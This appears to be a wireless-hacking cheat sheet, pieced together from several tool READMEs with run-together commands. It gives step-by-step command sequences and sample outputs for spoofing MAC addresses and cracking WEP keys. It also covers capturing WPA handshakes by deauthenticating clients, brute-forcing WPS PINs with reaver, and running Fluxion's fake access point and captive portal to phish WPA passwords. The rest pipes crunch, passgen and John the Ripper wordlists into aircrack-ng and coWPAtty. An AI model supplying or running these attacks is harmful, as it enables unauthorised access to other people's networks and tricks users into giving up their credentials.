Pentest Wireless Hacking
I personally use either of 2 items that I carry around in my hackers tool-belt.
ALFA Network card AWUS036NH - 802.11 b/g/n Long-Rage Approx £30 / $50
TP-LINK TL-WN722N - 150Mbs High-gain Approx £12 / $20
airmon-ng stop wlan0 ifconfig wlan0 down macchanger --mac aa:bb:cc:dd:ee:ff wlan0 airmon-ng start wlan0
Scan for networks:
airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
aireplay-ng -1 0 -a (bssid) -h aa:bb:cc:dd:ee:ff -e (essid) wlan0 aireplay-ng -3 -b (bssid) -h aa:bb:cc:dd:ee:ff wlan0 (captured data will have to be above 10,000 to crack)
aircrack-ng -b (bssid) (file_name-01.cap)
ifconfig wlan0 down airmon-ng stop wlan0 macchanger --mac=aa:bb:cc:dd:ee:ff wlan0 airmon-ng start wlan0
Scan for networks:
Choose your target and then:
airodump-ng --channel 6 wlan0 -w Desktop/CapFileName
Attack using AP MAC and Client MAC:
aireplay-ng -0 10 -a 00:1D:AA:30:6A:F9 mon0 --ignore-negative-one aircrack-ng -w ~/Desktop/Wordlist/CRACKED_PASS.dic /root/Desktop/CapFileName
$ wash -i mon0 Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <firstname.lastname@example.org> BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- 7C:4C:A5:77:52:B9 1 00 1.0 No SKYDFA47 E4:F4:C6:79:99:20 6 00 1.0 Yes leonteale-2Ghz
$ reaver -i mon0 -b E4:F4:C6:79:99:20 -c 6 -f -e leonteale-2Ghz -a -S -vv Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <email@example.com> [+] Switching mon0 to channel 6 [+] Waiting for beacon from E4:F4:C6:79:99:20 [+] Associated with E4:F4:C6:79:99:20 (ESSID: leonteale-2Ghz) [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
Fluxion is a remake of linset by vk496 with (hopefully) less bugs and more functionality. It's compatible with the latest release of Kali (rolling). If you're new, or just don't understand much about the project, have a look at the wiki. The attack is mostly manual, but experimental versions will automatically handle most functionality from the stable releases.
git clone https://github.com/deltaxflux/fluxion
How it works
Scan the networks. Capture a handshake (can't be used without a valid handshake, it's necessary to verify the password) Use WEB Interface * Launch a FakeAP instance to imitate the original access point Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the FakeAP and enter the WPA password. A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password Each submitted password is verified by the handshake captured earlier The attack will automatically terminate, as soon as a correct password is submitted
A Linux-based operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling. Kali 2 & 2016 support the latest aircrack-ng versions. An external wifi card is recommended.
crunch 8 8 1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ -t 97KQA@@@ | aircrack-ng -b 78:54:2E:28:E7:86 -w - thehak-01.cap
Passgen is an simple Python alternative for the random character generator Crunch which attempts to solve cracking WPA/WPA2 keys by randomizing the output as opposed to generating a list like so (aaaaaaaa, aaaaaaab, aaaaaac, etc).
Example usage with aircrack-ng:
python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w- WiFi.cap
Some other options are: * The Associative Word List Generator (AWLG) – Wordlists for Password Cracking * CeWL – Custom Word List Generator Tool for Password Cracking * RSMangler – Keyword Based Wordlist Generator For Bruteforcing * CUPP – Common User Passwords Profiler – Automated Password Profiling Tool Of course John the Ripper (JTR) has some built in options for creating permutations from Wordlists.
$ ./cowpatty -r eap-test.dump -f dict -s somethingclever coWPAtty 2.0 - WPA-PSK dictionary attack. <firstname.lastname@example.org> Collected all necessary data to mount crack against passphrase. Loading words into memory, please be patient ... Done (10201 words). Starting dictionary attack. Please be patient.     The PSK is "family movie night". 4087 passphrases tested in 59.05 seconds: 69.22 passphrases/second
This tool can also accept dictionary words from STDIN, allowing us to utilize a tool such as John the Ripper to create lots of word permutations from a dictionary file:
$ john -wordfile:dictfile -rules -session:johnrestore.dat -stdout:63 | cowpatty -r eap-test.dump -f - -s somethingclever
In the default configuration of John the Ripper, common permutations of dictionary words will be sent as potential passwords to coWPAtty. For example, here is a list of the words John will create from the input word "password":
$ echo password >word $ john -session:/tmp/delme -wordfile:word -rules -stdout password Password passwords password1 Password1 drowssap 1password PASSWORD password2 password! password3 password7 password9 password5 password4 password8 password6 password0 password. password? psswrd drowssaP Drowssap passworD 2password 4password Password2 Password! Password3 Password9 Password5 Password7 Password4 Password6 Password8 Password. Password? Password0 3password 7password 9password 5password 6password 8password Passwords passworded passwording Passworded Passwording words: 49 time: 0:00:00:00 100% w/s: 49.00 current: Passwording
John the Ripper is available at http://www.openwall.com/john/